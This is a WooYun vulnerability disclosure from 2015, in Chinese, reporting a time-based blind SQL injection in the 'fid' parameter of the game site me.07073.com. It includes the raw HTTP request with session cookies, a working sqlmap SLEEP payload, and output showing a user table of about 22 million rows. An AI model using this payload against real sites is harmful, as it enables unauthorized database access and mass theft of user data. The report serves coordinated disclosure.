当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102069

漏洞标题:07073游戏某站SQL注入再次影响22040912用户数据

相关厂商:07073.com

漏洞作者: BMa

提交时间:2015-03-18 09:40

修复时间:2015-05-02 10:38

公开时间:2015-05-02 10:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-18: 细节已通知厂商并且等待厂商处理中
2015-03-18: 厂商已经确认,细节仅向厂商公开
2015-03-28: 细节向核心白帽子及相关领域专家公开
2015-04-07: 细节向普通白帽子公开
2015-04-17: 细节向实习白帽子公开
2015-05-02: 细节向公众公开

简要描述:

再来07073用户数据共22040912 这几天新增了不少用户
无论认不认识我的人都知道,我从不乱脱人家裤子

详细说明:

me.07073.com


POST /bar/unBindBar/ HTTP/1.1
Host: me.07073.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: CNZZDATA30095910=cnzz_eid%3D1437763485-1426487774-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426633664; CNZZDATA30078424=cnzz_eid%3D1529681690-1426490357-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426636241; Hm_lvt_bc27030a8a4ca522156896972fe911f9=1426501460,1426501610; gift_169551=PVGMKKQFNKUYGC; DedeUserID=22166706; DedeUserID__ckMd5=195d5f4d055945af; DedeUsername=bma123; DedeUsername__ckMd5=ed597bcceffae423; loginState=1; loginName=bma123; www07073=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227dc5a977eb90e78961f8443615db3155%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22183.57.47.59%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A36.0%29+Gecko%2F20100101+Firefox%2F36.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426637627%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D5ad1b324fe917a886625fb4e3d2cc8ba; PHPSESSID=10f786029212f59d1a27744522eaebc2
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
fid=1


参数fid

1.jpg


2.jpg


3.jpg


4.jpg


延时注入,跑得慢,但也还可以,跑了所有数据库,与上次的对比一下

4.1.jpg


跑一下当前库的表

5.jpg


看到库和上次的一样,就直接查用户表

6.jpg


Parameter: fid (POST)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind (SELECT)
    Payload: fid=1' OR (SELECT * FROM (SELECT(SLEEP(5)))oqLu) AND 'Iwve'='Iwve
---
[09:28:34] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 7
back-end DBMS: MySQL 5.0.11
[09:28:34] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
[09:28:38] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
22040912
Database: bbs073
+------------+---------+
| Table      | Entries |
+------------+---------+
| uc_members | 22040912 |
+------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-18 10:36

厂商回复:

感谢提供漏洞信息

最新状态:

暂无